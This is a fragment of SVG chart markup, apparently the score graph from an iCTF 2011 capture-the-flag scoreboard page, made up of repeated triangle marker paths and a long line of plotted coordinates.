209.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 383 201.18 L 387 209.18 379 209.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 381.5 201.18 L 385.5 209.18 377.5 209.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 379.5 201.18 L 383.5 209.18 375.5 209.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 377.5 203.18 L 381.5 211.18 373.5 211.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 375.5 205.68 L 379.5 213.68 371.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 373.5 205.68 L 377.5 213.68 369.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 371.5 205.68 L 375.5 213.68 367.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 369.5 205.68 L 373.5 213.68 365.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 367.5 205.68 L 371.5 213.68 363.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 365.5 205.68 L 369.5 213.68 361.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 363.5 205.68 L 367.5 213.68 359.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 361.5 205.68 L 365.5 213.68 357.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 359.5 205.68 L 363.5 213.68 355.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 357.5 205.68 L 361.5 213.68 353.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 355.5 205.68 L 359.5 213.68 351.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 353.5 205.68 L 357.5 213.68 349.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 351.5 205.68 L 355.5 213.68 347.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 349.5 205.68 L 353.5 213.68 345.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 347.5 205.68 L 351.5 213.68 343.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 345.5 205.68 L 349.5 213.68 341.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 343.5 205.68 L 347.5 213.68 339.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 341.5 207.18 L 345.5 215.18 337.5 215.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 340 208.18 L 344 216.18 336 216.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 338 209.18 L 342 217.18 334 217.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 336 210.18 L 340 218.18 332 218.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 334 211.68 L 338 219.68 330 219.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 332 212.68 L 336 220.68 328 220.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 330 216.18 L 334 224.18 326 224.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 328 218.68 L 332 226.68 324 226.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 326 221.18 L 330 229.18 322 229.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 324 221.18 L 328 229.18 320 229.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 322 221.68 L 326 229.68 318 229.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 320 221.68 L 324 229.68 316 229.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 318 222.18 L 322 230.18 314 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 316 222.18 L 320 230.18 312 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 314 222.18 L 318 230.18 310 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 312 222.18 L 316 230.18 308 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 310 222.18 L 314 230.18 306 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 308 222.18 L 312 230.18 304 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 306 222.18 L 310 230.18 302 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 304 222.18 L 308 230.18 300 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 302 222.18 L 306 230.18 298 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 300.5 222.18 L 304.5 230.18 296.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 298.5 222.18 L 302.5 230.18 294.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 296.5 222.18 L 300.5 230.18 292.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 294.5 222.18 L 298.5 230.18 290.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 292.5 222.18 L 296.5 230.18 288.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 290.5 222.18 L 294.5 230.18 286.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 288.5 222.18 L 292.5 230.18 284.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 286.5 222.18 L 290.5 230.18 282.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 284.5 222.18 L 288.5 230.18 280.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 282.5 222.18 L 286.5 230.18 278.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 280.5 222.18 L 284.5 230.18 276.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 278.5 222.18 L 282.5 230.18 274.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 276.5 222.18 L 280.5 230.18 272.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 274.5 222.18 L 278.5 230.18 270.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 272.5 222.18 L 276.5 230.18 268.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 270.5 222.18 L 274.5 230.18 266.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 268.5 222.18 L 272.5 230.18 264.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 266.5 222.18 L 270.5 230.18 262.5 230.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 264.5 222.68 L 268.5 230.68 260.5 230.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 262.5 222.68 L 266.5 230.68 258.5 230.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 260.5 222.68 L 264.5 230.68 256.5 230.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 259 223.18 L 263 231.18 255 231.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 257 223.18 L 261 231.18 253 231.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 255 223.68 L 259 231.68 251 231.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 253 224.18 L 257 232.18 249 232.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 251 224.68 L 255 232.68 247 232.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 249 225.18 L 253 233.18 245 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 247 225.18 L 251 233.18 243 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 245 225.18 L 249 233.18 241 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 243 225.68 L 247 233.68 239 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 241 226.18 L 245 234.18 237 234.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 239 227.18 L 243 235.18 235 235.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 237 227.18 L 241 235.18 233 235.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 235 227.68 L 239 235.68 231 235.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 233 227.68 L 237 235.68 229 235.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 231 229.18 L 235 237.18 227 237.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 229 229.68 L 233 237.68 225 237.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 227 230.68 L 231 238.68 223 238.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 225 232.18 L 229 240.18 221 240.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 223 232.68 L 227 240.68 219 240.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 221 233.68 L 225 241.68 217 241.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 219.5 234.68 L 223.5 242.68 215.5 242.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 217.5 235.68 L 221.5 243.68 213.5 243.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 215.5 236.18 L 219.5 244.18 211.5 244.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 213.5 236.68 L 217.5 244.68 209.5 244.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 211.5 236.68 L 215.5 244.68 207.5 244.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 209.5 237.18 L 213.5 245.18 205.5 245.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 207.5 237.18 L 211.5 245.18 203.5 245.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 205.5 237.68 L 209.5 245.68 201.5 245.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 203.5 238.18 L 207.5 246.18 199.5 246.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 201.5 239.18 L 205.5 247.18 197.5 247.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 199.5 239.68 L 203.5 247.68 195.5 247.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 197.5 240.18 L 201.5 248.18 193.5 248.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 195.5 241.18 L 199.5 249.18 191.5 249.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 193.5 241.18 L 197.5 249.18 189.5 249.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 191.5 241.68 L 195.5 249.68 187.5 249.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 189.5 242.18 L 193.5 250.18 185.5 250.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 187.5 242.18 L 191.5 250.18 183.5 250.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 185.5 242.68 L 189.5 250.68 181.5 250.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 183.5 243.18 L 187.5 251.18 179.5 251.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 181.5 243.18 L 185.5 251.18 177.5 251.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 179.5 244.18 L 183.5 252.18 175.5 252.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 178 244.18 L 182 252.18 174 252.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 176 244.68 L 180 252.68 172 252.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 174 244.68 L 178 252.68 170 252.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 172 245.18 L 176 253.18 168 253.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 170 245.68 L 174 253.68 166 253.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 168 245.68 L 172 253.68 164 253.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 166 246.18 L 170 254.18 162 254.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 164 246.68 L 168 254.68 160 254.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 162 246.68 L 166 254.68 158 254.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 160 247.18 L 164 255.18 156 255.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 158 247.18 L 162 255.18 154 255.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 156 247.68 L 160 255.68 152 255.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 154 247.68 L 158 255.68 150 255.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 152 247.68 L 156 255.68 148 255.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 150 247.68 L 154 255.68 146 255.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 148 247.68 L 152 255.68 144 255.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 146 248.18 L 150 256.18 142 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 144 248.18 L 148 256.18 140 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 142 248.18 L 146 256.18 138 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 140 248.18 L 144 256.18 136 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 138.5 248.18 L 142.5 256.18 134.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 136.5 248.18 L 140.5 256.18 132.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 134.5 248.18 L 138.5 256.18 130.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 132.5 248.18 L 136.5 256.18 128.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 130.5 248.18 L 134.5 256.18 126.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 128.5 248.18 L 132.5 256.18 124.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 126.5 248.18 L 130.5 256.18 122.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 124.5 248.18 L 128.5 256.18 120.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 122.5 248.18 L 126.5 256.18 118.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 120.5 248.18 L 124.5 256.18 116.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 118.5 248.18 L 122.5 256.18 114.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 116.5 248.18 L 120.5 256.18 112.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 114.5 248.18 L 118.5 256.18 110.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 112.5 248.18 L 116.5 256.18 108.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 110.5 248.18 L 114.5 256.18 106.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 108.5 248.18 L 112.5 256.18 104.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 106.5 248.18 L 110.5 256.18 102.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 104.5 248.18 L 108.5 256.18 100.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 102.5 248.18 L 106.5 256.18 98.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 100.5 248.18 L 104.5 256.18 96.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 98.5 248.18 L 102.5 256.18 94.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 97 248.18 L 101 256.18 93 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 95 248.18 L 99 256.18 91 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 93 248.18 L 97 256.18 89 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 91 248.18 L 95 256.18 87 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 89 248.18 L 93 256.18 85 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 87 248.18 L 91 256.18 83 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 85 248.18 L 89 256.18 81 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 83 248.18 L 87 256.18 79 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 81 248.18 L 85 256.18 77 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 79 248.18 L 83 256.18 75 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 77 248.18 L 81 256.18 73 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 75 248.18 L 79 256.18 71 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 73 248.18 L 77 256.18 69 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 71 248.18 L 75 256.18 67 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 69 248.18 L 73 256.18 65 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 67 248.18 L 71 256.18 63 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 65 248.18 L 69 256.18 61 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 63 248.18 L 67 256.18 59 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 61 248.18 L 65 256.18 57 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 59 248.18 L 63 256.18 55 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 57.5 248.18 L 61.5 256.18 53.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 55.5 248.18 L 59.5 256.18 51.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 53.5 248.18 L 57.5 256.18 49.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 51.5 248.18 L 55.5 256.18 47.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 49.5 248.18 L 53.5 256.18 45.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 47.5 248.18 L 51.5 256.18 43.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 45.5 248.18 L 49.5 256.18 41.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 43.5 248.18 L 47.5 256.18 39.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 41.5 248.18 L 45.5 256.18 37.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 39.5 248.18 L 43.5 256.18 35.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 37.5 248.18 L 41.5 256.18 33.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 35.5 248.18 L 39.5 256.18 31.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 33.5 248.18 L 37.5 256.18 29.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 31.5 248.18 L 35.5 256.18 27.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 29.5 248.18 L 33.5 256.18 25.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 27.5 248.18 L 31.5 256.18 23.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 25.5 248.18 L 29.5 256.18 21.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 23.5 248.18 L 27.5 256.18 19.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 21.5 248.18 L 25.5 256.18 17.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 19.5 248.18 L 23.5 256.18 15.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 17.5 248.18 L 21.5 256.18 13.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 16 248.18 L 20 256.18 12 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 14 248.18 L 18 256.18 10 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 12 248.18 L 16 256.18 8 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 10 248.18 L 14 256.18 6 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 8 248.18 L 12 256.18 4 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 6 248.18 L 10 256.18 2 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 4 248.18 L 8 256.18 0 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-185)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.3976502857143 L 177.76797385620918 253.10150820571428 L 179.74361259655382 252.84318646857142 L 181.71925133689842 252.60570989714284 L 183.69489007724306 252.60570989714284 L 185.67052881758767 252.60570989714284 L 187.6461675579323 252.60570989714284 L 189.6218062982769 252.60570989714284 L 191.59744503862154 252.60570989714284 L 193.57308377896615 252.60570989714284 L 195.5487225193108 252.60570989714284 L 197.52436125965542 252.60570989714284 L 199.50000000000003 252.60570989714284 L 201.47563874034466 252.60570989714284 L 203.45127748068927 250.98599789714285 L 205.4269162210339 250.98599789714285 L 207.4025549613785 250.98599789714285 L 209.37819370172315 250.98599789714285 L 211.35383244206778 250.98599789714285 L 213.3294711824124 250.98599789714285 L 215.30510992275703 250.98599789714285 L 217.28074866310163 250.98599789714285 L 219.25638740344627 250.98599789714285 L 221.23202614379088 250.98599789714285 L 223.2076648841355 250.4364527542857 L 225.18330362448012 249.93511332571427 L 227.15894236482475 249.93511332571427 L 229.1345811051694 249.53982646857145 L 231.110219845514 249.53982646857145 L 233.08585858585863 249.53982646857145 L 235.06149732620324 249.53982646857145 L 237.03713606654787 249.53982646857145 L 239.01277480689248 249.53982646857145 L 240.98841354723712 249.53982646857145 L 242.96405228758175 249.53982646857145 L 244.93969102792636 249.53982646857145 L 246.915329768271 249.53982646857145 L 248.8909685086156 249.53982646857145 L 250.86660724896024 249.53982646857145 L 252.84224598930484 249.53982646857145 L 254.81788472964945 249.53982646857145 L 256.79352346999406 249.53982646857145 L 258.7691622103387 248.86735393523855 L 260.7448009506833 247.3421166780957 L 262.72043969102793 245.7781879923814 L 264.69607843137254 244.8127543923814 L 266.6717171717172 243.33746784000272 L 268.6473559120618 243.33746784000272 L 270.6229946524064 240.63312726857413 L 272.598633392751 239.97671766857414 L 274.5742721330957 239.53577238857414 L 276.5499108734403 238.19585650285984 L 278.5255496137849 236.10180027428842 L 280.50118835412957 234.534150445717 L 282.4768270944742 234.534150445717 L 284.4524658348188 234.26227021714556 L 286.4281045751634 233.96496781714555 L 288.40374331550805 233.41542267428844 L 290.37938205585266 232.85141581714555 L 292.35502079619727 231.14493353143126 L 294.33065953654193 226.42077353143128 L 296.30629827688654 225.04259753143128 L 298.28193701723114 220.39556667428843 L 300.25757575757575 219.74250610285986 L 302.2332144979204 215.66785467428844 L 304.208853238265 214.29103181714726 L 306.1844919786096 213.48981901714558 L 308.1601307189543 212.21140347428843 L 310.1357694592989 211.19806861714557 L 312.1114081996435 210.66261476571697 L 314.0870469399881 209.9221749942884 L 316.0626856803328 209.65511533714556 L 318.0383244206774 208.45868333714554 L 320.013963161022 208.19258779428841 L 321.98960190136665 208.19258779428841 L 323.96524064171126 208.19258779428841 L 325.94087938205587 208.19258779428841 L 327.9165181224005 208.19258779428841 L 329.89215686274514 208.19258779428841 L 331.86779560308975 208.19258779428841 L 333.84343434343435 208.19258779428841 L 335.81907308377896 208.19258779428841 L 337.7947118241236 208.19258779428841 L 339.77035056446823 